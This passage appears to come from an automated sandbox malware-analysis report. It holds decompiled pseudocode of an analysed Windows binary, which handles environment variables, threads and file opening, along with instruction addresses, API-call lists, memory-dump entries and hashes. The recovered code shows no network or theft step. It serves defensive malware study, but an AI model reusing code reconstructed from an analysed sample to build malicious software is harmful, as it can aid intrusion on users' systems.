					E0040DE60(0x417058, _t225);
					_v40 = _v40 + 1;
					_t444 = _v40;
					if(_v40 >= 0) {
						continue;
					}
					break;
				}
				_t349 =  *0x417058; // 0x2379f50
				_t114 = E0040DE20();
				_t350 = _t349;
				E0040DFC0(_t350);
				_t351 = _a8;
				E0040DFC0(_t351);
				E0040DE60(0x417058, _t114);
				_t119 = E0040DE20();
				_t352 = _t351;
				E00403275(_t421, _t423, _v8, _v4);
				E0040DE60( &_v0, _t119);
				_v4 = E004097FE();
				 *0x41704c = GetModuleHandleW(0);
				_t125 = E0040DE20();
				_t353 = _t352;
				_push(_t125);
				_t126 = E0040DE20();
				_t354 = _t353;
				_push(_t126);
				_t127 = E0040DE20();
				_t355 = _t354;
				_push(_t127);
				_t128 = E0040DE20();
				_t356 = _t355;
				E00405182(E0040D0A0( *0x417040, 1, _t128));
				_v64 = _v64 + _t356;
				E00405E50(_t347, _t444);
				_push( &_v20);
				E0040DE60();
				_t134 = E0040DE20();
				_t357 = _t356;
				_push(_t134);
				_t135 = E0040DE20();
				_t358 = _t357;
				_push(_t135);
				_t136 = E0040DE20();
				_t359 = _t358;
				_push(_t136);
				_t137 = E0040DE20();
				_t360 = _t359;
				E00405182(E0040D0A0(_v28, 1, _t137));
				 *_t424 =  *_t424 + _t360;
				E00405E50(_t347, _t444);
				_push( &_v48);
				E0040DE60();
				_v56 = E00402E9D(_v56);
				_t144 = E0040DE20();
				_t361 = _t360;
				E004051A0(E004021A4(_t347, _t361, _t421, _t422, _v56, _t144));
				E0040195B(_t361);
				E0040460E(_t361, _t422, _v64);
				_t149 = E0040DE20();
				_t362 = _t361;
				_push(_t149);
				_push(_v100);
				_push(_v68 + 4);
				_pop(_t150);
				_t151 = E00405100(_t150);
				E0040358D(_t422);
				E0040DE60(0x417048, _t151);
				PathRemoveBackslashW( *0x417048);
				E0040213E(_v84);
				_t157 = E0040DE20();
				_t363 = _t362;
				_push(_t157);
				_t158 = E0040DE20();
				_t364 = _t363;
				E00402BFA(_t444,  *0x417048);
				E00405182(E0040E020(_t347));
				_v144 = _v144 + _t364;
				E004051A0(E00409860(_v108, _t158));
				_t365 =  *0x417024; // 0x2374be0
				_t164 = E0040DE20();
				_t366 = _t365;
				E0040DFC0(_t366);
				_t367 =  *0x417058; // 0x2379f50
				E0040DFC0(_t367);
				E0040DE60(0x417058, _t164);
				_t169 = E0040DE20();
				_t368 = _t367;
				E00401E55(_t368, _t422, _t444, _v128);
				E0040DE60( &_v120, _t169);
				E00403855(_t347, _t421);
				_t369 =  *0x417038; // 0x2378e20
				_t174 = E0040DE20();
				_t370 = _t369;
				E0040DFC0(_t370);
				E0040DE60( &_v128, _t174);
				PathQuoteSpacesW(_v136);
				_push(_v136);
				_t178 = E0040DE20();
				_pop(_t372);
				E0040DFC0(_t372);
				E0040DFC0(0x416026);
				_t374 = _v148;
				E0040DFC0(_t374);
				E0040DE60( &_v152, _t178);
				PathQuoteSpacesW(_v160);
				_t328 =  *0x417060; // 0x0
				_t445 = _t328 - 1;
				if(_t328 != 1) {
					E00402CA9(_t421, _t422, _a28);
				} else {
					 *0x417010 = E00405492(_t328, E00402CA9, _a28);
				}
				_push(_t374);
				_push(E0040DE20());
				_push( *((intOrPtr*)(_t424 + 0x1c)));
				_t186 = E0040DE20();
				_pop(_t377);
				_push(_t186);
				E0040DFC0(_t377);
				E0040DFC0(0x416026);
				_t379 = _a28;
				E0040DFC0(_t379);
				E0040E020(_t347);
				_t191 = E0040DE20();
				_t380 = _t379;
				_push(_t191);
				_push(_t380);
				E0040A795(_t445, E0040DE20());
				E0040E020(_t347);
				_push(_a4);
				_t195 = E0040DE20();
				_pop(_t383);
				E0040DFC0(_t383);
				_t384 = _v16;
				_t198 = E00405182(E0040DFC0(_t384));
				_v52 = _v52 + _t384;
				_t199 = E00405182(_t198);
				_v48 = _v48 + _t384;
				E00405182(_t199);
				_v44 = _v44 + _t384;
				_a4 = E004051A0(E00402022(), _t195);
				_push(_a4);
				E00401FA9(_t328);
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(0, _v16), _v12), _v52), _v52), _v64), _v56), _v28), _v52),  *((intOrPtr*)(_t424 + 0x1c))), _v68);
			}





















































































































































                                                                                                                                                                      0x00403df3
                                                                                                                                                                      0x00403df3
                                                                                                                                                                      0x00403df3
                                                                                                                                                                      0x00403df3
                                                                                                                                                                      0x00403df4
                                                                                                                                                                      0x00403df9
                                                                                                                                                                      0x00403df9
                                                                                                                                                                      0x00403dfc
                                                                                                                                                                      0x00403e03
                                                                                                                                                                      0x00403e03
                                                                                                                                                                      0x00403e06
                                                                                                                                                                      0x00403e10
                                                                                                                                                                      0x00403e15
                                                                                                                                                                      0x00403e1e
                                                                                                                                                                      0x00403e23
                                                                                                                                                                      0x00403e26
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00403e28
                                                                                                                                                                      0x00403e30
                                                                                                                                                                      0x00403e34
                                                                                                                                                                      0x00403e3b
                                                                                                                                                                      0x00403e40
                                                                                                                                                                      0x00403e41
                                                                                                                                                                      0x00403e42
                                                                                                                                                                      0x00403e43
                                                                                                                                                                      0x00403e52
                                                                                                                                                                      0x00403e5c
                                                                                                                                                                      0x00403e65
                                                                                                                                                                      0x00403e66
                                                                                                                                                                      0x00403e6b
                                                                                                                                                                      0x00403e6e
                                                                                                                                                                      0x00403e73
                                                                                                                                                                      0x00403e78
                                                                                                                                                                      0x00403e82
                                                                                                                                                                      0x00403e87
                                                                                                                                                                      0x00403e8a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00403e8a
                                                                                                                                                                      0x00403e91
                                                                                                                                                                      0x00403e96
                                                                                                                                                                      0x00403e9f
                                                                                                                                                                      0x00403ea4
                                                                                                                                                                      0x00403ea7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00403ea9
                                                                                                                                                                      0x00403eb1
                                                                                                                                                                      0x00403eb5
                                                                                                                                                                      0x00403ebc
                                                                                                                                                                      0x00403ec1
                                                                                                                                                                      0x00403ec2
                                                                                                                                                                      0x00403ec3
                                                                                                                                                                      0x00403ec4
                                                                                                                                                                      0x00403ed3
                                                                                                                                                                      0x00403edd
                                                                                                                                                                      0x00403ee6
                                                                                                                                                                      0x00403ee7
                                                                                                                                                                      0x00403eec
                                                                                                                                                                      0x00403eef
                                                                                                                                                                      0x00403ef4
                                                                                                                                                                      0x00403ef9
                                                                                                                                                                      0x00403f03
                                                                                                                                                                      0x00403f08
                                                                                                                                                                      0x00403f0b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00403f0b
                                                                                                                                                                      0x00403f12
                                                                                                                                                                      0x00403f17
                                                                                                                                                                      0x00403f20
                                                                                                                                                                      0x00403f25
                                                                                                                                                                      0x00403f28
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00403f2a
                                                                                                                                                                      0x00403f32
                                                                                                                                                                      0x00403f36
                                                                                                                                                                      0x00403f3d
                                                                                                                                                                      0x00403f42
                                                                                                                                                                      0x00403f43
                                                                                                                                                                      0x00403f44
                                                                                                                                                                      0x00403f45
                                                                                                                                                                      0x00403f54
                                                                                                                                                                      0x00403f5e
                                                                                                                                                                      0x00403f67
                                                                                                                                                                      0x00403f68
                                                                                                                                                                      0x00403f6d
                                                                                                                                                                      0x00403f70
                                                                                                                                                                      0x00403f75
                                                                                                                                                                      0x00403f7a
                                                                                                                                                                      0x00403f84
                                                                                                                                                                      0x00403f89
                                                                                                                                                                      0x00403f8c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00403f8c
                                                                                                                                                                      0x00403f93
                                                                                                                                                                      0x00403f98
                                                                                                                                                                      0x00403fa1
                                                                                                                                                                      0x00403fa6
                                                                                                                                                                      0x00403fa9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00403fab
                                                                                                                                                                      0x00403fb3
                                                                                                                                                                      0x00403fb7
                                                                                                                                                                      0x00403fbe
                                                                                                                                                                      0x00403fc3
                                                                                                                                                                      0x00403fc4
                                                                                                                                                                      0x00403fc5
                                                                                                                                                                      0x00403fc6
                                                                                                                                                                      0x00403fd5
                                                                                                                                                                      0x00403fdf
                                                                                                                                                                      0x00403fe8
                                                                                                                                                                      0x00403fe9
                                                                                                                                                                      0x00403fee
                                                                                                                                                                      0x00403ff1
                                                                                                                                                                      0x00403ff6
                                                                                                                                                                      0x00403ffb
                                                                                                                                                                      0x00404005
                                                                                                                                                                      0x0040400a
                                                                                                                                                                      0x0040400d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040400d
                                                                                                                                                                      0x00404014
                                                                                                                                                                      0x00404019
                                                                                                                                                                      0x00404022
                                                                                                                                                                      0x00404027
                                                                                                                                                                      0x0040402a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040402c
                                                                                                                                                                      0x00404034
                                                                                                                                                                      0x00404038
                                                                                                                                                                      0x0040403f
                                                                                                                                                                      0x00404044
                                                                                                                                                                      0x00404045
                                                                                                                                                                      0x00404046
                                                                                                                                                                      0x00404047
                                                                                                                                                                      0x00404056
                                                                                                                                                                      0x00404060
                                                                                                                                                                      0x00404069
                                                                                                                                                                      0x0040406a
                                                                                                                                                                      0x0040406f
                                                                                                                                                                      0x00404072
                                                                                                                                                                      0x00404077
                                                                                                                                                                      0x0040407c
                                                                                                                                                                      0x00404086
                                                                                                                                                                      0x0040408b
                                                                                                                                                                      0x0040408e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040408e
                                                                                                                                                                      0x00404095
                                                                                                                                                                      0x0040409a
                                                                                                                                                                      0x004040a3
                                                                                                                                                                      0x004040a8
                                                                                                                                                                      0x004040ab
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004040ad
                                                                                                                                                                      0x004040b5
                                                                                                                                                                      0x004040b9
                                                                                                                                                                      0x004040c0
                                                                                                                                                                      0x004040c5
                                                                                                                                                                      0x004040c6
                                                                                                                                                                      0x004040c7
                                                                                                                                                                      0x004040c8
                                                                                                                                                                      0x004040d7
                                                                                                                                                                      0x004040e1
                                                                                                                                                                      0x004040e6
                                                                                                                                                                      0x004040ed
                                                                                                                                                                      0x004040f2
                                                                                                                                                                      0x004040f5
                                                                                                                                                                      0x004040fa
                                                                                                                                                                      0x004040ff
                                                                                                                                                                      0x0040410b
                                                                                                                                                                      0x00404110
                                                                                                                                                                      0x00404113
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00404113
                                                                                                                                                                      0x0040411a
                                                                                                                                                                      0x0040411f
                                                                                                                                                                      0x00404128
                                                                                                                                                                      0x0040412d
                                                                                                                                                                      0x00404130
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00404132
                                                                                                                                                                      0x0040413a
                                                                                                                                                                      0x0040413e
                                                                                                                                                                      0x00404145
                                                                                                                                                                      0x0040414a
                                                                                                                                                                      0x0040414b
                                                                                                                                                                      0x0040414c
                                                                                                                                                                      0x0040414d
                                                                                                                                                                      0x0040415c
                                                                                                                                                                      0x00404166
                                                                                                                                                                      0x0040416b
                                                                                                                                                                      0x00404172
                                                                                                                                                                      0x00404177
                                                                                                                                                                      0x0040417a
                                                                                                                                                                      0x0040417f
                                                                                                                                                                      0x00404184
                                                                                                                                                                      0x00404190
                                                                                                                                                                      0x00404195
                                                                                                                                                                      0x00404198
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00404198
                                                                                                                                                                      0x0040419f
                                                                                                                                                                      0x004041a4
                                                                                                                                                                      0x004041ad
                                                                                                                                                                      0x004041b2
                                                                                                                                                                      0x004041b5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004041b7
                                                                                                                                                                      0x004041bf
                                                                                                                                                                      0x004041c3
                                                                                                                                                                      0x004041ca
                                                                                                                                                                      0x004041cf
                                                                                                                                                                      0x004041d0
                                                                                                                                                                      0x004041d1
                                                                                                                                                                      0x004041d2
                                                                                                                                                                      0x004041e1
                                                                                                                                                                      0x004041eb
                                                                                                                                                                      0x004041f0
                                                                                                                                                                      0x004041f7
                                                                                                                                                                      0x004041fc
                                                                                                                                                                      0x004041ff
                                                                                                                                                                      0x00404204
                                                                                                                                                                      0x00404209
                                                                                                                                                                      0x00404215
                                                                                                                                                                      0x0040421a
                                                                                                                                                                      0x0040421d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040421d
                                                                                                                                                                      0x00404224
                                                                                                                                                                      0x00404229
                                                                                                                                                                      0x00404232
                                                                                                                                                                      0x00404237
                                                                                                                                                                      0x0040423a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040423c
                                                                                                                                                                      0x00404244
                                                                                                                                                                      0x00404248
                                                                                                                                                                      0x0040424f
                                                                                                                                                                      0x00404254
                                                                                                                                                                      0x00404255
                                                                                                                                                                      0x00404256
                                                                                                                                                                      0x00404257
                                                                                                                                                                      0x00404266
                                                                                                                                                                      0x00404270
                                                                                                                                                                      0x00404275
                                                                                                                                                                      0x0040427c
                                                                                                                                                                      0x00404281
                                                                                                                                                                      0x00404284
                                                                                                                                                                      0x00404289
                                                                                                                                                                      0x0040428e
                                                                                                                                                                      0x0040429a
                                                                                                                                                                      0x0040429f
                                                                                                                                                                      0x0040429f
                                                                                                                                                                      0x004042a2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004042a2
                                                                                                                                                                      0x004042a4
                                                                                                                                                                      0x004042ab
                                                                                                                                                                      0x004042b0
                                                                                                                                                                      0x004042b3
                                                                                                                                                                      0x004042b8
                                                                                                                                                                      0x004042bd
                                                                                                                                                                      0x004042c9
                                                                                                                                                                      0x004042cf
                                                                                                                                                                      0x004042d4
                                                                                                                                                                      0x004042de
                                                                                                                                                                      0x004042e8
                                                                                                                                                                      0x004042f2
                                                                                                                                                                      0x00404300
                                                                                                                                                                      0x00404306
                                                                                                                                                                      0x0040430b
                                                                                                                                                                      0x0040430c
                                                                                                                                                                      0x0040430e
                                                                                                                                                                      0x00404313
                                                                                                                                                                      0x00404314
                                                                                                                                                                      0x00404316
                                                                                                                                                                      0x0040431b
                                                                                                                                                                      0x0040431c
                                                                                                                                                                      0x0040431e
                                                                                                                                                                      0x00404323
                                                                                                                                                                      0x00404335
                                                                                                                                                                      0x0040433a
                                                                                                                                                                      0x0040433d
                                                                                                                                                                      0x00404346
                                                                                                                                                                      0x00404347
                                                                                                                                                                      0x0040434d
                                                                                                                                                                      0x00404352
                                                                                                                                                                      0x00404353
                                                                                                                                                                      0x00404355
                                                                                                                                                                      0x0040435a
                                                                                                                                                                      0x0040435b
                                                                                                                                                                      0x0040435d
                                                                                                                                                                      0x00404362
                                                                                                                                                                      0x00404363
                                                                                                                                                                      0x00404365
                                                                                                                                                                      0x0040436a
                                                                                                                                                                      0x0040437a
                                                                                                                                                                      0x0040437f
                                                                                                                                                                      0x00404382
                                                                                                                                                                      0x0040438b
                                                                                                                                                                      0x0040438c
                                                                                                                                                                      0x0040439a
                                                                                                                                                                      0x0040439f
                                                                                                                                                                      0x004043a4
                                                                                                                                                                      0x004043af
                                                                                                                                                                      0x004043b4
                                                                                                                                                                      0x004043bd
                                                                                                                                                                      0x004043c3
                                                                                                                                                                      0x004043c8
                                                                                                                                                                      0x004043c9
                                                                                                                                                                      0x004043ca
                                                                                                                                                                      0x004043d5
                                                                                                                                                                      0x004043d6
                                                                                                                                                                      0x004043d7
                                                                                                                                                                      0x004043dd
                                                                                                                                                                      0x004043e9
                                                                                                                                                                      0x004043f4
                                                                                                                                                                      0x004043fd
                                                                                                                                                                      0x00404403
                                                                                                                                                                      0x00404408
                                                                                                                                                                      0x00404409
                                                                                                                                                                      0x0040440b
                                                                                                                                                                      0x00404410
                                                                                                                                                                      0x00404418
                                                                                                                                                                      0x00404426
                                                                                                                                                                      0x0040442b
                                                                                                                                                                      0x00404434
                                                                                                                                                                      0x00404439
                                                                                                                                                                      0x00404440
                                                                                                                                                                      0x00404445
                                                                                                                                                                      0x00404448
                                                                                                                                                                      0x0040444d
                                                                                                                                                                      0x00404454
                                                                                                                                                                      0x00404460
                                                                                                                                                                      0x00404466
                                                                                                                                                                      0x0040446b
                                                                                                                                                                      0x00404471
                                                                                                                                                                      0x0040447b
                                                                                                                                                                      0x00404480
                                                                                                                                                                      0x00404485
                                                                                                                                                                      0x0040448c
                                                                                                                                                                      0x00404491
                                                                                                                                                                      0x00404494
                                                                                                                                                                      0x0040449e
                                                                                                                                                                      0x004044a7
                                                                                                                                                                      0x004044b0
                                                                                                                                                                      0x004044b1
                                                                                                                                                                      0x004044b6
                                                                                                                                                                      0x004044b9
                                                                                                                                                                      0x004044c4
                                                                                                                                                                      0x004044c9
                                                                                                                                                                      0x004044ce
                                                                                                                                                                      0x004044d8
                                                                                                                                                                      0x004044e1
                                                                                                                                                                      0x004044e6
                                                                                                                                                                      0x004044ec
                                                                                                                                                                      0x004044ef
                                                                                                                                                                      0x0040450d
                                                                                                                                                                      0x004044f1
                                                                                                                                                                      0x00404502
                                                                                                                                                                      0x00404502
                                                                                                                                                                      0x00404512
                                                                                                                                                                      0x00404519
                                                                                                                                                                      0x0040451e
                                                                                                                                                                      0x0040451f
                                                                                                                                                                      0x00404524
                                                                                                                                                                      0x00404525
                                                                                                                                                                      0x00404527
                                                                                                                                                                      0x00404532
                                                                                                                                                                      0x00404537
                                                                                                                                                                      0x0040453c
                                                                                                                                                                      0x00404541
                                                                                                                                                                      0x00404547
                                                                                                                                                                      0x0040454c
                                                                                                                                                                      0x0040454d
                                                                                                                                                                      0x0040454e
                                                                                                                                                                      0x00404556
                                                                                                                                                                      0x0040455b
                                                                                                                                                                      0x00404564
                                                                                                                                                                      0x00404565
                                                                                                                                                                      0x0040456a
                                                                                                                                                                      0x0040456d
                                                                                                                                                                      0x00404572
                                                                                                                                                                      0x0040457c
                                                                                                                                                                      0x00404581
                                                                                                                                                                      0x00404584
                                                                                                                                                                      0x00404589
                                                                                                                                                                      0x0040458d
                                                                                                                                                                      0x00404592
                                                                                                                                                                      0x004045a0
                                                                                                                                                                      0x004045a4
                                                                                                                                                                      0x004045a8
                                                                                                                                                                      0x0040460d

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                        • Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
                                                                                                                                                                        • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
                                                                                                                                                                        • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                                                                                                        • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040DEBC
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02379F50,00000000,00000000), ref: 004042FB
                                                                                                                                                                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                                                                                                                                                                        • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32 ref: 00402C34
                                                                                                                                                                        • Part of subcall function 0040E020: TlsGetValue.KERNEL32(0000001B,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E02A
                                                                                                                                                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                        • Part of subcall function 00409860: SetEnvironmentVariableW.KERNELBASE(02379F50,02379F50,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409879
                                                                                                                                                                        • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,02379F50,02374BE0,00000000,00000000), ref: 00401E8A
                                                                                                                                                                      • PathQuoteSpacesW.SHLWAPI(00000000,00000001,02378E20,00000000,00000000,00000000,00000000,00000000,02379F50,02374BE0,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
                                                                                                                                                                      • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,00416026,00000000,00000000,00000000,00000001,02378E20,00000000,00000000,00000000,00000000,00000000,02379F50,02374BE0), ref: 004044E1
                                                                                                                                                                        • Part of subcall function 00405492: CreateThread.KERNEL32 ref: 004054AB
                                                                                                                                                                        • Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                                                                                                                                                        • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                                                                                                                                                        • Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                                                                                                                                                        • Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                                                                                                                                                                      • String ID: &`A$&`A$`A
                                                                                                                                                                      • API String ID: 1881381519-2092548216
                                                                                                                                                                      • Opcode ID: d8bfe981472dcd7d93d567ac996c87e0102c3ae3209f1c8df4a41c7dce2c2386
                                                                                                                                                                      • Instruction ID: 95625e34f548e5502c8bb68b533fb61ff434c3c21d69ae2a44b2ba18bfe99ca0
                                                                                                                                                                      • Opcode Fuzzy Hash: d8bfe981472dcd7d93d567ac996c87e0102c3ae3209f1c8df4a41c7dce2c2386
                                                                                                                                                                      • Instruction Fuzzy Hash: 1822E9B5914700AED200BBF1DD8197F77BDEB98718F10D83FB540AA192CA3CD8465B69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040AA60, Relevance: 9.2, APIs: 6, Instructions: 157filememoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040AA60(void* _a4, WCHAR* _a8, intOrPtr _a12, long _a16) {
				long _v4;
				long _v8;
				intOrPtr _t49;
				void* _t50;
				long _t52;
				long _t53;
				long _t61;
				void* _t62;
				long _t64;
				long _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;
				void* _t71;
				void* _t72;
				void* _t73;

				_t68 = _a16;
				_t73 = 0;
				_t70 = _t68 & 0x0000001f;
				_v8 = _t70;
				if(_t70 == 0) {
					_v8 = 2;
				}
				_t72 = E0040D438( *0x41771c, _a4);
				if(_t72 == 0) {
					L40:
					return _t73;
				} else {
					_t49 = _a12;
					if(_t49 != 1) {
						if(_t49 != 2) {
							if(_t49 != 3) {
								_t71 = _a16;
								goto L23;
							} else {
								_t61 = 0;
								_a16 = 0;
								if((_t68 & 0x00020000) != 0) {
									_t61 = 1;
									_a16 = 1;
								}
								if((_t68 & 0x00040000) != 0) {
									_t61 = _t61 | 0x00000007;
									_a16 = _t61;
								}
								_t62 = CreateFileW(_a8, 0xc0000000, _t61, 0, 2, 0x80, 0); // executed
								_t71 = _t62;
								if(_t71 != 0xffffffff) {
									goto L24;
								} else {
									_t71 = CreateFileW(_a8, 0x40000000, _a16, 0, 5, 0, 0);
									goto L23;
								}
							}
						} else {
							_t64 = 0;
							if((_t68 & 0x00020000) != 0) {
								_t64 = 1;
							}
							if((_t68 & 0x00040000) != 0) {
								_t64 = _t64 | 0x00000007;
							}
							_t71 = CreateFileW(_a8, 0xc0000000, _t64, 0, 4, 0x80, 0);
							goto L23;
						}
					} else {
						_t66 = 0;
						if((_t68 & 0x00020000) != 0) {
							_t66 = 1;
						}
						if((_t68 & 0x00040000) != 0) {
							_t66 = _t66 | 0x00000007;
						}
						_t67 = CreateFileW(_a8, 0x80000000, _t66, 0, 3, 0x80, 0); // executed
						_t71 = _t67;
						L23:
						if(_t71 == 0xffffffff) {
							L36:
							_t50 = _a4;
							goto L37;
						} else {
							L24:
							if(_t71 == 0) {
								goto L36;
							} else {
								_t52 =  *0x41612c; // 0x1000
								if(_t52 == 0 || (_t68 & 0x00080000) != 0) {
									 *(_t72 + 4) = _t73;
								} else {
									 *(_t72 + 4) = HeapAlloc( *0x417008, 0, _t52);
								}
								 *_t72 = _t71;
								_t53 =  *0x41612c; // 0x1000
								 *(_t72 + 8) = _t53;
								 *(_t72 + 0x18) = _v8;
								 *(_t72 + 0xc) = _t73;
								 *(_t72 + 0x14) = 1;
								 *(_t72 + 0x1c) = 0 | _a12 == 0x00000001;
								if(_a12 == 2 && (_t68 & 0x00100000) != 0) {
									_v4 = _t73;
									SetFilePointer(_t71, 0,  &_v4, 2);
								}
								_t50 = _a4;
								_t73 = _t72;
								if(_t50 != 0xffffffff) {
									_t73 = _t71;
								}
								if(_t73 == 0) {
									L37:
									if(_t50 != 0xffffffff) {
										_t72 = _t50;
									}
									E0040D3AA( *0x41771c, _t72);
									goto L40;
								} else {
									return _t73;
								}
							}
						}
					}
				}
			}



















                                                                                                                                                                      0x0040aa64
                                                                                                                                                                      0x0040aa6d
                                                                                                                                                                      0x0040aa6f
                                                                                                                                                                      0x0040aa72
                                                                                                                                                                      0x0040aa76
                                                                                                                                                                      0x0040aa78
                                                                                                                                                                      0x0040aa78
                                                                                                                                                                      0x0040aa8f
                                                                                                                                                                      0x0040aa93
                                                                                                                                                                      0x0040ac44
                                                                                                                                                                      0x0040ac4b
                                                                                                                                                                      0x0040aa99
                                                                                                                                                                      0x0040aa99
                                                                                                                                                                      0x0040aaa0
                                                                                                                                                                      0x0040aae1
                                                                                                                                                                      0x0040ab1f
                                                                                                                                                                      0x0040ab88
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040ab21
                                                                                                                                                                      0x0040ab21
                                                                                                                                                                      0x0040ab23
                                                                                                                                                                      0x0040ab2d
                                                                                                                                                                      0x0040ab2f
                                                                                                                                                                      0x0040ab34
                                                                                                                                                                      0x0040ab34
                                                                                                                                                                      0x0040ab3e
                                                                                                                                                                      0x0040ab40
                                                                                                                                                                      0x0040ab43
                                                                                                                                                                      0x0040ab43
                                                                                                                                                                      0x0040ab5c
                                                                                                                                                                      0x0040ab62
                                                                                                                                                                      0x0040ab67
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040ab69
                                                                                                                                                                      0x0040ab84
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040ab84
                                                                                                                                                                      0x0040ab67
                                                                                                                                                                      0x0040aae3
                                                                                                                                                                      0x0040aae3
                                                                                                                                                                      0x0040aaeb
                                                                                                                                                                      0x0040aaed
                                                                                                                                                                      0x0040aaed
                                                                                                                                                                      0x0040aaf8
                                                                                                                                                                      0x0040aafa
                                                                                                                                                                      0x0040aafa
